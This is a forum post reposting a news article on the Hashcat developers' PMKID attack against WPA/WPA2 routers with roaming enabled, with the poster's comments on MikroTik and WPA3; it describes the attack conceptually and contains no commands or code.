Researchers have accidentally discovered a new attack on the wi-fi protected access protocols used in wireless access points that makes it easier for outsiders to capture access credentials.
The new attack captures the Pairwise Master Key Identifier (PMKID) and - according to the Hashcat password recovery utility developers that devised it - works against 802.11i/p/q/r networks with roaming functions enabled, which covers most modern routers.
What is the difference between the new attack and previous WPA/WPA2 cracks?
According to Hashcat developer Jen “Atom” Steube, the most significant difference between older attacks and the newly discovered method is that an attacker no longer needs another user to be on the targeted network to capture credentials. The only thing needed is the initiation of the authentication process.
The researcher also added that earlier WPA/WPA2 attacks were more challenging to carry out, because “in the past the attacker had to record the WPA four-way handshake to launch an offline attack”. This may sound easy but in fact this type of attack can create a lot of trouble from a technical perspective.
The new attack is much easier to pull off, because “if you receive the PMKID from the access point, you will be able to get into the network if you can guess the [WPA] pre-shared key (PSK)“.
Depending on the length and complexity of the pre-shared key, the success of the attack may vary. It should be noted that most users don’t have the technical capacity to change the PSK on their routers and generally use the manufacturer generated key. This becomes a premise for attackers to guess the key. The cracking of such a password becomes even easier with manufacturers creating PSKs following a pattern that can be traced back to the make of the routers.
In a nutshell, here’s why this attack is much better than previous techniques:
– No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
– No more waiting for a complete 4-way handshake between the regular user and the AP
– No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
– No more eventual invalid passwords sent by the regular user
– No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
– No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
– No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string
Who is affected?
At this time, the researchers are not sure for which vendors or for how many routers this technique will work, but they definitely think it will work against all 802.11i/p/q/r networks with roaming functions enabled. Shortly put, this means most modern routers.
My post is just a repost from here https://sensorstechforum.com/attack-wpa ... n-routers/
Also more info can be found here https://hashcat.net/forum/thread-7717.html and here https://www.itnews.com.au/news/new-wi-f ... eds-499659
Guess it's time for Mikrotik to try to find if they are vulnerable and what can they do.
Just another reason we need WPA3 sooner.